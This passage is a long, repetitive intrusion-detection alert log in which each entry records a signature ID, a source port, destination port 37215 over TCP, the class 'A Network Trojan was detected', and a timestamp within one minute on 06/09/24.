          SID:2835222
          Source Port:48610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.041380
          SID:2835222
          Source Port:54358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.105288
          SID:2835222
          Source Port:48954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948304
          SID:2835222
          Source Port:36144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822488
          SID:2829579
          Source Port:34026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947339
          SID:2835222
          Source Port:47462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643714
          SID:2829579
          Source Port:46588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035803
          SID:2829579
          Source Port:57632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.079835
          SID:2835222
          Source Port:45018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283170
          SID:2829579
          Source Port:36602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916967
          SID:2829579
          Source Port:40008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.635007
          SID:2835222
          Source Port:37548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822565
          SID:2829579
          Source Port:35454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922255
          SID:2835222
          Source Port:39838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.697652
          SID:2829579
          Source Port:51216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568206
          SID:2829579
          Source Port:36568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035849
          SID:2829579
          Source Port:47030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034180
          SID:2829579
          Source Port:41274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166237
          SID:2835222
          Source Port:40930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283245
          SID:2835222
          Source Port:52136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032827
          SID:2835222
          Source Port:43904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.490295
          SID:2835222
          Source Port:34864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714432
          SID:2829579
          Source Port:38434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163826
          SID:2835222
          Source Port:37964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230197
          SID:2829579
          Source Port:57776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418996
          SID:2829579
          Source Port:55404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596867
          SID:2829579
          Source Port:38576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077115
          SID:2835222
          Source Port:58980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867216
          SID:2835222
          Source Port:38696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475760
          SID:2829579
          Source Port:46926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294883
          SID:2829579
          Source Port:43466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538800
          SID:2835222
          Source Port:54498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862859
          SID:2835222
          Source Port:35192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033525
          SID:2829579
          Source Port:39594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164757
          SID:2835222
          Source Port:48302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821058
          SID:2829579
          Source Port:57424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286473
          SID:2835222
          Source Port:49810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.552337
          SID:2835222
          Source Port:55222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250512
          SID:2829579
          Source Port:48416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.681906
          SID:2835222
          Source Port:33736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599871
          SID:2829579
          Source Port:54128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282570
          SID:2835222
          Source Port:53736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.696354
          SID:2835222
          Source Port:60526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037688
          SID:2835222
          Source Port:40580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399617
          SID:2829579
          Source Port:38518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165984
          SID:2835222
          Source Port:55270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223606
          SID:2829579
          Source Port:60200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.636212
          SID:2835222
          Source Port:40206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821825
          SID:2835222
          Source Port:45158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918993
          SID:2829579
          Source Port:45076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164201
          SID:2829579
          Source Port:59304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169221
          SID:2835222
          Source Port:33748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397554
          SID:2829579
          Source Port:55752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.080702
          SID:2829579
          Source Port:55086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413870
          SID:2829579
          Source Port:33488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539031
          SID:2829579
          Source Port:33542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864442
          SID:2829579
          Source Port:48178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471730
          SID:2835222
          Source Port:45614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599468
          SID:2829579
          Source Port:40796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860775
          SID:2829579
          Source Port:42818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080720
          SID:2829579
          Source Port:46874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604579
          SID:2835222
          Source Port:44734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250611
          SID:2835222
          Source Port:34736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.698479
          SID:2829579
          Source Port:44090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600360
          SID:2835222
          Source Port:55848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161029
          SID:2835222
          Source Port:42260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602710
          SID:2829579
          Source Port:50316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538326
          SID:2829579
          Source Port:38432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.474701
          SID:2829579
          Source Port:34400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028775
          SID:2835222
          Source Port:38324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.133934
          SID:2835222
          Source Port:37722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718819
          SID:2835222
          Source Port:53628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721432
          SID:2835222
          Source Port:60044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946032
          SID:2835222
          Source Port:41466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.594081
          SID:2835222
          Source Port:33660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206430
          SID:2835222
          Source Port:47140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033684
          SID:2835222
          Source Port:48580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225768
          SID:2835222
          Source Port:36604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563365
          SID:2835222
          Source Port:58038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414703
          SID:2829579
          Source Port:49240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823119
          SID:2835222
          Source Port:33768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415711
          SID:2835222
          Source Port:35276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821041
          SID:2835222
          Source Port:41618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226848
          SID:2829579
          Source Port:44670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472101
          SID:2835222
          Source Port:36072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206694
          SID:2835222
          Source Port:50294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225501
          SID:2829579
          Source Port:33884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.987330
          SID:2829579
          Source Port:33788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163995
          SID:2835222
          Source Port:48180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599555
          SID:2829579
          Source Port:38638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246639
          SID:2829579
          Source Port:43472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.658201
          SID:2835222
          Source Port:57994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028927
          SID:2835222
          Source Port:60538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.651531
          SID:2829579
          Source Port:35350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.994746
          SID:2829579
          Source Port:56448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946781
          SID:2835222
          Source Port:56986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718870
          SID:2835222
          Source Port:58430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249310
          SID:2829579
          Source Port:34224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990884
          SID:2829579
          Source Port:46056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076526
          SID:2835222
          Source Port:51562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645352
          SID:2835222
          Source Port:53144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719800
          SID:2835222
          Source Port:43392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718629
          SID:2835222
          Source Port:57576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289528
          SID:2829579
          Source Port:47148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557479
          SID:2835222
          Source Port:58728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820467
          SID:2829579
          Source Port:38696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104581
          SID:2829579
          Source Port:44104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168578
          SID:2835222
          Source Port:51384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165569
          SID:2829579
          Source Port:44506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713828
          SID:2829579
          Source Port:48252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.127802
          SID:2835222
          Source Port:42806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161261
          SID:2829579
          Source Port:52896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.891236
          SID:2835222
          Source Port:33674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538103
          SID:2835222
          Source Port:50636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469642
          SID:2835222
          Source Port:33476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478617
          SID:2829579
          Source Port:59326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032588
          SID:2829579
          Source Port:50502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166033
          SID:2835222
          Source Port:48860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010889
          SID:2835222
          Source Port:56108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008222
          SID:2829579
          Source Port:49380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.105287
          SID:2835222
          Source Port:39758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.297891
          SID:2829579
          Source Port:46600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820962
          SID:2829579
          Source Port:46668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.289071
          SID:2829579
          Source Port:38078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.480741
          SID:2829579
          Source Port:56058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242713
          SID:2829579
          Source Port:41966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926963
          SID:2835222
          Source Port:44354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077958
          SID:2829579
          Source Port:37884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993663
          SID:2835222
          Source Port:52196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987107
          SID:2835222
          Source Port:51462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719726
          SID:2835222
          Source Port:33506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566279
          SID:2835222
          Source Port:52190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035103
          SID:2835222
          Source Port:60608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168320
          SID:2829579
          Source Port:48060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.128945
          SID:2835222
          Source Port:50346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869198
          SID:2835222
          Source Port:41194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206436
          SID:2829579
          Source Port:33386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564117
          SID:2829579
          Source Port:47826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720189
          SID:2835222
          Source Port:47668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035201
          SID:2835222
          Source Port:37300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206888
          SID:2829579
          Source Port:38652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716835
          SID:2829579
          Source Port:50810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418318
          SID:2829579
          Source Port:54138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818448
          SID:2835222
          Source Port:39348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719321
          SID:2835222
          Source Port:44256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163080
          SID:2829579
          Source Port:59026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714261
          SID:2829579
          Source Port:37920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207894
          SID:2835222
          Source Port:36512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645101
          SID:2829579
          Source Port:56318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102547
          SID:2829579
          Source Port:39564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986535
          SID:2829579
          Source Port:56766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074347
          SID:2829579
          Source Port:53564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.268409
          SID:2829579
          Source Port:54506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034067
          SID:2835222
          Source Port:33990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161887
          SID:2829579
          Source Port:50764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987227
          SID:2835222
          Source Port:41450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644401
          SID:2829579
          Source Port:55620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159629
          SID:2829579
          Source Port:58174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923593
          SID:2829579
          Source Port:47844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.660851
          SID:2835222
          Source Port:53236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645372
          SID:2835222
          Source Port:54074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.464688
          SID:2829579
          Source Port:59446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.891141
          SID:2835222
          Source Port:47474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399288
          SID:2829579
          Source Port:58912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081608
          SID:2835222
          Source Port:59312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.998689
          SID:2829579
          Source Port:51570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466083
          SID:2829579
          Source Port:33012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538472
          SID:2835222
          Source Port:51364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.134646
          SID:2835222
          Source Port:45510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477424
          SID:2829579
          Source Port:49786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914173
          SID:2835222
          Source Port:57572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165975
          SID:2835222
          Source Port:46500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.285060
          SID:2835222
          Source Port:46178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558941
          SID:2835222
          Source Port:48742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.132544
          SID:2829579
          Source Port:44830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.251430
          SID:2835222
          Source Port:57688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928500
          SID:2829579
          Source Port:54224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.952845
          SID:2835222
          Source Port:50872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930173
          SID:2835222
          Source Port:53882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.987170
          SID:2835222
          Source Port:37296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249548
          SID:2829579
          Source Port:56062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.569454
          SID:2829579
          Source Port:58930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029842
          SID:2835222
          Source Port:47972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.651577
          SID:2835222
          Source Port:58804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645446
          SID:2829579
          Source Port:60754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.951064
          SID:2835222
          Source Port:58096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.490194
          SID:2829579
          Source Port:56580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822387
          SID:2835222
          Source Port:40912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.998728
          SID:2835222
          Source Port:52942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716498
          SID:2835222
          Source Port:53446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715407
          SID:2829579
          Source Port:60422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.592752
          SID:2835222
          Source Port:43152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224429
          SID:2835222
          Source Port:43704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081121
          SID:2829579
          Source Port:51782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945555
          SID:2835222
          Source Port:39218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478630
          SID:2829579
          Source Port:53606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075579
          SID:2835222
          Source Port:52756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540293
          SID:2829579
          Source Port:57832
          Destination Port:37215
